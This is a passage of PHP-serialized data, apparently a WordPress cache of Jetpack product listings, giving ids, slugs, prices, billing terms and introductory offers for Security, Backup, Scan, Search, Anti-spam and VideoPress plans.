Real-time\";s:12:\"product_slug\";s:33:\"jetpack_security_realtime_monthly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:7:\"jetpack\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:25:\"jetpack-security-realtime\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:6:\"$69.95\";s:21:\"combined_cost_display\";s:6:\"$69.95\";s:4:\"cost\";d:69.9500000000000028421709430404007434844970703125;s:18:\"cost_smallest_unit\";i:6995;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:5:\"month\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";}s:16:\"jetpack_complete\";O:8:\"stdClass\":18:{s:10:\"product_id\";i:2014;s:12:\"product_name\";s:16:\"Jetpack Complete\";s:12:\"product_slug\";s:16:\"jetpack_complete\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:7:\"jetpack\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:16:\"jetpack-complete\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:7:\"$600.00\";s:21:\"combined_cost_display\";s:7:\"$600.00\";s:4:\"cost\";i:600;s:18:\"cost_smallest_unit\";i:60000;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:4:\"year\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";}s:24:\"jetpack_complete_monthly\";O:8:\"stdClass\":18:{s:10:\"product_id\";i:2015;s:12:\"product_name\";s:16:\"Jetpack Complete\";s:12:\"product_slug\";s:24:\"jetpack_complete_monthly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:7:\"jetpack\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:16:\"jetpack-complete\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:7:\"$100.00\";s:21:\"combined_cost_display\";s:7:\"$100.00\";s:4:\"cost\";i:100;s:18:\"cost_smallest_unit\";i:10000;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:5:\"month\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";}s:26:\"jetpack_security_t1_yearly\";O:8:\"stdClass\":18:{s:10:\"product_id\";i:2016;s:12:\"product_name\";s:23:\"Jetpack Security (10GB)\";s:12:\"product_slug\";s:26:\"jetpack_security_t1_yearly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:6:\"bundle\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:23:\"jetpack-security-tier-1\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:7:\"$240.00\";s:21:\"combined_cost_display\";s:7:\"$240.00\";s:4:\"cost\";i:240;s:18:\"cost_smallest_unit\";i:24000;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:4:\"year\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";}s:27:\"jetpack_security_t1_monthly\";O:8:\"stdClass\":18:{s:10:\"product_id\";i:2017;s:12:\"product_name\";s:23:\"Jetpack Security (10GB)\";s:12:\"product_slug\";s:27:\"jetpack_security_t1_monthly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:6:\"bundle\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:23:\"jetpack-security-tier-1\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:6:\"$40.00\";s:21:\"combined_cost_display\";s:6:\"$40.00\";s:4:\"cost\";i:40;s:18:\"cost_smallest_unit\";i:4000;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:5:\"month\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";}s:26:\"jetpack_security_t2_yearly\";O:8:\"stdClass\":19:{s:10:\"product_id\";i:2019;s:12:\"product_name\";s:22:\"Jetpack Security (1TB)\";s:12:\"product_slug\";s:26:\"jetpack_security_t2_yearly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:6:\"bundle\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:23:\"jetpack-security-tier-2\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:7:\"$822.75\";s:21:\"combined_cost_display\";s:7:\"$822.75\";s:4:\"cost\";d:899.3999999999999772626324556767940521240234375;s:18:\"cost_smallest_unit\";i:89940;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:4:\"year\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";s:18:\"introductory_offer\";O:8:\"stdClass\":6:{s:13:\"interval_unit\";s:4:\"year\";s:14:\"interval_count\";i:1;s:11:\"usage_limit\";N;s:17:\"cost_per_interval\";d:359.3999999999999772626324556767940521240234375;s:30:\"transition_after_renewal_count\";i:0;s:30:\"should_prorate_when_offer_ends\";b:0;}}s:27:\"jetpack_security_t2_monthly\";O:8:\"stdClass\":18:{s:10:\"product_id\";i:2020;s:12:\"product_name\";s:22:\"Jetpack Security (1TB)\";s:12:\"product_slug\";s:27:\"jetpack_security_t2_monthly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:6:\"bundle\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:23:\"jetpack-security-tier-2\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:6:\"$74.95\";s:21:\"combined_cost_display\";s:6:\"$74.95\";s:4:\"cost\";d:74.9500000000000028421709430404007434844970703125;s:18:\"cost_smallest_unit\";i:7495;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:5:\"month\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";}s:41:\"jetpack_backup_addon_storage_10gb_monthly\";O:8:\"stdClass\":18:{s:10:\"product_id\";i:2040;s:12:\"product_name\";s:47:\"Jetpack VaultPress Backup Add-on Storage (10GB)\";s:12:\"product_slug\";s:41:\"jetpack_backup_addon_storage_10gb_monthly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:7:\"jetpack\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:33:\"jetpack-backup-addon-storage-10gb\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:5:\"$6.00\";s:21:\"combined_cost_display\";s:5:\"$6.00\";s:4:\"cost\";i:6;s:18:\"cost_smallest_unit\";i:600;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:5:\"month\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";}s:42:\"jetpack_backup_addon_storage_100gb_monthly\";O:8:\"stdClass\":18:{s:10:\"product_id\";i:2044;s:12:\"product_name\";s:48:\"Jetpack VaultPress Backup Add-on Storage (100GB)\";s:12:\"product_slug\";s:42:\"jetpack_backup_addon_storage_100gb_monthly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:7:\"jetpack\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:34:\"jetpack-backup-addon-storage-100gb\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:6:\"$10.00\";s:21:\"combined_cost_display\";s:6:\"$10.00\";s:4:\"cost\";i:10;s:18:\"cost_smallest_unit\";i:1000;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:5:\"month\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";}s:40:\"jetpack_backup_addon_storage_1tb_monthly\";O:8:\"stdClass\":18:{s:10:\"product_id\";i:2048;s:12:\"product_name\";s:46:\"Jetpack VaultPress Backup Add-on Storage (1TB)\";s:12:\"product_slug\";s:40:\"jetpack_backup_addon_storage_1tb_monthly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:7:\"jetpack\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:32:\"jetpack-backup-addon-storage-1tb\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:6:\"$20.00\";s:21:\"combined_cost_display\";s:6:\"$20.00\";s:4:\"cost\";i:20;s:18:\"cost_smallest_unit\";i:2000;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:5:\"month\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";}s:40:\"jetpack_backup_addon_storage_3tb_monthly\";O:8:\"stdClass\":18:{s:10:\"product_id\";i:2052;s:12:\"product_name\";s:46:\"Jetpack VaultPress Backup Add-on Storage (3TB)\";s:12:\"product_slug\";s:40:\"jetpack_backup_addon_storage_3tb_monthly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:7:\"jetpack\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:32:\"jetpack-backup-addon-storage-3tb\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:6:\"$20.00\";s:21:\"combined_cost_display\";s:6:\"$20.00\";s:4:\"cost\";i:20;s:18:\"cost_smallest_unit\";i:2000;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:5:\"month\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";}s:40:\"jetpack_backup_addon_storage_5tb_monthly\";O:8:\"stdClass\":18:{s:10:\"product_id\";i:2056;s:12:\"product_name\";s:46:\"Jetpack VaultPress Backup Add-on Storage (5TB)\";s:12:\"product_slug\";s:40:\"jetpack_backup_addon_storage_5tb_monthly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:7:\"jetpack\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:32:\"jetpack-backup-addon-storage-5tb\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:6:\"$30.00\";s:21:\"combined_cost_display\";s:6:\"$30.00\";s:4:\"cost\";i:30;s:18:\"cost_smallest_unit\";i:3000;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:5:\"month\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";}s:20:\"jetpack_backup_daily\";O:8:\"stdClass\":19:{s:10:\"product_id\";i:2100;s:12:\"product_name\";s:22:\"Jetpack Backup (Daily)\";s:12:\"product_slug\";s:20:\"jetpack_backup_daily\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:7:\"jetpack\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:20:\"jetpack-backup-daily\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:7:\"$119.00\";s:21:\"combined_cost_display\";s:7:\"$119.00\";s:4:\"cost\";i:119;s:18:\"cost_smallest_unit\";i:11900;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:4:\"year\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";s:18:\"introductory_offer\";O:8:\"stdClass\":6:{s:13:\"interval_unit\";s:4:\"year\";s:14:\"interval_count\";i:1;s:11:\"usage_limit\";N;s:17:\"cost_per_interval\";i:59;s:30:\"transition_after_renewal_count\";i:0;s:30:\"should_prorate_when_offer_ends\";b:0;}}s:28:\"jetpack_backup_daily_monthly\";O:8:\"stdClass\":18:{s:10:\"product_id\";i:2101;s:12:\"product_name\";s:22:\"Jetpack Backup (Daily)\";s:12:\"product_slug\";s:28:\"jetpack_backup_daily_monthly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:7:\"jetpack\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:20:\"jetpack-backup-daily\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:5:\"$9.95\";s:21:\"combined_cost_display\";s:5:\"$9.95\";s:4:\"cost\";d:9.949999999999999289457264239899814128875732421875;s:18:\"cost_smallest_unit\";i:995;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:5:\"month\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";}s:23:\"jetpack_backup_realtime\";O:8:\"stdClass\":19:{s:10:\"product_id\";i:2102;s:12:\"product_name\";s:26:\"Jetpack Backup (Real-time)\";s:12:\"product_slug\";s:23:\"jetpack_backup_realtime\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:7:\"jetpack\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:23:\"jetpack-backup-realtime\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:7:\"$599.00\";s:21:\"combined_cost_display\";s:7:\"$599.00\";s:4:\"cost\";i:599;s:18:\"cost_smallest_unit\";i:59900;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:4:\"year\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";s:18:\"introductory_offer\";O:8:\"stdClass\":6:{s:13:\"interval_unit\";s:4:\"year\";s:14:\"interval_count\";i:1;s:11:\"usage_limit\";N;s:17:\"cost_per_interval\";i:299;s:30:\"transition_after_renewal_count\";i:0;s:30:\"should_prorate_when_offer_ends\";b:0;}}s:31:\"jetpack_backup_realtime_monthly\";O:8:\"stdClass\":18:{s:10:\"product_id\";i:2103;s:12:\"product_name\";s:26:\"Jetpack Backup (Real-time)\";s:12:\"product_slug\";s:31:\"jetpack_backup_realtime_monthly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:7:\"jetpack\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:23:\"jetpack-backup-realtime\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:6:\"$49.95\";s:21:\"combined_cost_display\";s:6:\"$49.95\";s:4:\"cost\";d:49.9500000000000028421709430404007434844970703125;s:18:\"cost_smallest_unit\";i:4995;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:5:\"month\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";}s:14:\"jetpack_search\";O:8:\"stdClass\":18:{s:10:\"product_id\";i:2104;s:12:\"product_name\";s:14:\"Jetpack Search\";s:12:\"product_slug\";s:14:\"jetpack_search\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:6:\"search\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:14:\"jetpack-search\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:6:\"$99.00\";s:21:\"combined_cost_display\";s:6:\"$99.00\";s:4:\"cost\";i:99;s:18:\"cost_smallest_unit\";i:9900;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:1:{i:0;O:8:\"stdClass\":12:{s:13:\"minimum_units\";i:0;s:13:\"maximum_units\";N;s:13:\"minimum_price\";i:0;s:13:\"maximum_price\";i:0;s:28:\"transform_quantity_divide_by\";i:10000;s:24:\"transform_quantity_round\";s:2:\"up\";s:8:\"flat_fee\";i:0;s:12:\"per_unit_fee\";i:9900;s:21:\"minimum_price_display\";s:2:\"$0\";s:29:\"minimum_price_monthly_display\";s:2:\"$0\";s:21:\"maximum_price_display\";N;s:29:\"maximum_price_monthly_display\";N;}}s:25:\"price_tier_usage_quantity\";i:657;s:12:\"product_term\";s:4:\"year\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";}s:22:\"jetpack_search_monthly\";O:8:\"stdClass\":18:{s:10:\"product_id\";i:2105;s:12:\"product_name\";s:14:\"Jetpack Search\";s:12:\"product_slug\";s:22:\"jetpack_search_monthly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:6:\"search\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:14:\"jetpack-search\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:5:\"$8.25\";s:21:\"combined_cost_display\";s:5:\"$8.25\";s:4:\"cost\";d:8.25;s:18:\"cost_smallest_unit\";i:825;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:1:{i:0;O:8:\"stdClass\":12:{s:13:\"minimum_units\";i:0;s:13:\"maximum_units\";N;s:13:\"minimum_price\";i:0;s:13:\"maximum_price\";i:0;s:28:\"transform_quantity_divide_by\";i:10000;s:24:\"transform_quantity_round\";s:2:\"up\";s:8:\"flat_fee\";i:0;s:12:\"per_unit_fee\";i:825;s:21:\"minimum_price_display\";s:2:\"$0\";s:29:\"minimum_price_monthly_display\";s:2:\"$0\";s:21:\"maximum_price_display\";N;s:29:\"maximum_price_monthly_display\";N;}}s:25:\"price_tier_usage_quantity\";i:657;s:12:\"product_term\";s:5:\"month\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";}s:12:\"jetpack_scan\";O:8:\"stdClass\":18:{s:10:\"product_id\";i:2106;s:12:\"product_name\";s:18:\"Jetpack Scan Daily\";s:12:\"product_slug\";s:12:\"jetpack_scan\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:7:\"jetpack\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:12:\"jetpack-scan\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:7:\"$120.00\";s:21:\"combined_cost_display\";s:7:\"$120.00\";s:4:\"cost\";i:120;s:18:\"cost_smallest_unit\";i:12000;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:4:\"year\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";}s:20:\"jetpack_scan_monthly\";O:8:\"stdClass\":18:{s:10:\"product_id\";i:2107;s:12:\"product_name\";s:18:\"Jetpack Scan Daily\";s:12:\"product_slug\";s:20:\"jetpack_scan_monthly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:7:\"jetpack\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:12:\"jetpack-scan\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:6:\"$20.00\";s:21:\"combined_cost_display\";s:6:\"$20.00\";s:4:\"cost\";i:20;s:18:\"cost_smallest_unit\";i:2000;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:5:\"month\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";}s:21:\"jetpack_scan_realtime\";O:8:\"stdClass\":18:{s:10:\"product_id\";i:2108;s:12:\"product_name\";s:21:\"Jetpack Scan Realtime\";s:12:\"product_slug\";s:21:\"jetpack_scan_realtime\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:7:\"jetpack\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:21:\"jetpack-scan-realtime\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:7:\"$500.00\";s:21:\"combined_cost_display\";s:7:\"$500.00\";s:4:\"cost\";i:500;s:18:\"cost_smallest_unit\";i:50000;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:4:\"year\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";}s:29:\"jetpack_scan_realtime_monthly\";O:8:\"stdClass\":18:{s:10:\"product_id\";i:2109;s:12:\"product_name\";s:21:\"Jetpack Scan Realtime\";s:12:\"product_slug\";s:29:\"jetpack_scan_realtime_monthly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:7:\"jetpack\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:21:\"jetpack-scan-realtime\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:6:\"$50.00\";s:21:\"combined_cost_display\";s:6:\"$50.00\";s:4:\"cost\";i:50;s:18:\"cost_smallest_unit\";i:5000;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:5:\"month\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";}s:17:\"jetpack_anti_spam\";O:8:\"stdClass\":18:{s:10:\"product_id\";i:2110;s:12:\"product_name\";s:25:\"Jetpack Akismet Anti-spam\";s:12:\"product_slug\";s:17:\"jetpack_anti_spam\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:7:\"jetpack\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:17:\"jetpack-anti-spam\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:7:\"$120.00\";s:21:\"combined_cost_display\";s:7:\"$120.00\";s:4:\"cost\";i:120;s:18:\"cost_smallest_unit\";i:12000;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:4:\"year\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";}s:25:\"jetpack_anti_spam_monthly\";O:8:\"stdClass\":18:{s:10:\"product_id\";i:2111;s:12:\"product_name\";s:25:\"Jetpack Akismet Anti-spam\";s:12:\"product_slug\";s:25:\"jetpack_anti_spam_monthly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:7:\"jetpack\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:17:\"jetpack-anti-spam\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:6:\"$20.00\";s:21:\"combined_cost_display\";s:6:\"$20.00\";s:4:\"cost\";i:20;s:18:\"cost_smallest_unit\";i:2000;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:5:\"month\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";}s:24:\"jetpack_backup_t1_yearly\";O:8:\"stdClass\":19:{s:10:\"product_id\";i:2112;s:12:\"product_name\";s:32:\"Jetpack VaultPress Backup (10GB)\";s:12:\"product_slug\";s:24:\"jetpack_backup_t1_yearly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:7:\"jetpack\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:21:\"jetpack-backup-tier-1\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:7:\"$120.00\";s:21:\"combined_cost_display\";s:7:\"$120.00\";s:4:\"cost\";i:120;s:18:\"cost_smallest_unit\";i:12000;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:4:\"year\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";s:18:\"introductory_offer\";O:8:\"stdClass\":6:{s:13:\"interval_unit\";s:5:\"month\";s:14:\"interval_count\";i:1;s:11:\"usage_limit\";i:0;s:17:\"cost_per_interval\";i:12;s:30:\"transition_after_renewal_count\";i:0;s:30:\"should_prorate_when_offer_ends\";b:0;}}s:25:\"jetpack_backup_t1_monthly\";O:8:\"stdClass\":18:{s:10:\"product_id\";i:2113;s:12:\"product_name\";s:32:\"Jetpack VaultPress Backup (10GB)\";s:12:\"product_slug\";s:25:\"jetpack_backup_t1_monthly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:7:\"jetpack\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:21:\"jetpack-backup-tier-1\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:6:\"$20.00\";s:21:\"combined_cost_display\";s:6:\"$20.00\";s:4:\"cost\";i:20;s:18:\"cost_smallest_unit\";i:2000;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:5:\"month\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";}s:24:\"jetpack_backup_t2_yearly\";O:8:\"stdClass\":19:{s:10:\"product_id\";i:2114;s:12:\"product_name\";s:31:\"Jetpack VaultPress Backup (1TB)\";s:12:\"product_slug\";s:24:\"jetpack_backup_t2_yearly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:7:\"jetpack\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:21:\"jetpack-backup-tier-2\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:7:\"$359.40\";s:21:\"combined_cost_display\";s:7:\"$359.40\";s:4:\"cost\";d:359.3999999999999772626324556767940521240234375;s:18:\"cost_smallest_unit\";i:35940;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:4:\"year\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";s:18:\"introductory_offer\";O:8:\"stdClass\":6:{s:13:\"interval_unit\";s:4:\"year\";s:14:\"interval_count\";i:1;s:11:\"usage_limit\";N;s:17:\"cost_per_interval\";d:143.400000000000005684341886080801486968994140625;s:30:\"transition_after_renewal_count\";i:0;s:30:\"should_prorate_when_offer_ends\";b:0;}}s:25:\"jetpack_backup_t2_monthly\";O:8:\"stdClass\":18:{s:10:\"product_id\";i:2115;s:12:\"product_name\";s:31:\"Jetpack VaultPress Backup (1TB)\";s:12:\"product_slug\";s:25:\"jetpack_backup_t2_monthly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:7:\"jetpack\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:21:\"jetpack-backup-tier-2\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:6:\"$29.95\";s:21:\"combined_cost_display\";s:6:\"$29.95\";s:4:\"cost\";d:29.949999999999999289457264239899814128875732421875;s:18:\"cost_smallest_unit\";i:2995;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:5:\"month\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";}s:18:\"jetpack_videopress\";O:8:\"stdClass\":18:{s:10:\"product_id\";i:2116;s:12:\"product_name\";s:18:\"Jetpack VideoPress\";s:12:\"product_slug\";s:18:\"jetpack_videopress\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:7:\"jetpack\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:18:\"jetpack-videopress\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:7:\"$120.00\";s:21:\"combined_cost_display\";s:7:\"$120.00\";s:4:\"cost\";i:120;s:18:\"cost_smallest_unit\";i:12000;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:4:\"year\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";}s:26:\"jetpack_videopress_monthly\";O:8:\"stdClass\":18:{s:10:\"product_id\";i:2117;s:12:\"product_name\";s:18:\"Jetpack VideoPress\";s:12:\"product_slug\";s:26:\"jetpack_videopress_monthly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:7:\"jetpack\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:18:\"jetpack-videopress\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:6:\"$20.00\";s:21:\"combined_cost_display\";s:6:\"$20.00\";s:4:\"cost\";i:20;s:18:\"cost_smallest_unit\";i:2000;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:5:\"month\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";}s:24:\"jetpack_backup_t0_yearly\";O:8:\"stdClass\":18:{s:10:\"product_id\";i:2120;s:12:\"product_name\";s:31:\"Jetpack VaultPress Backup 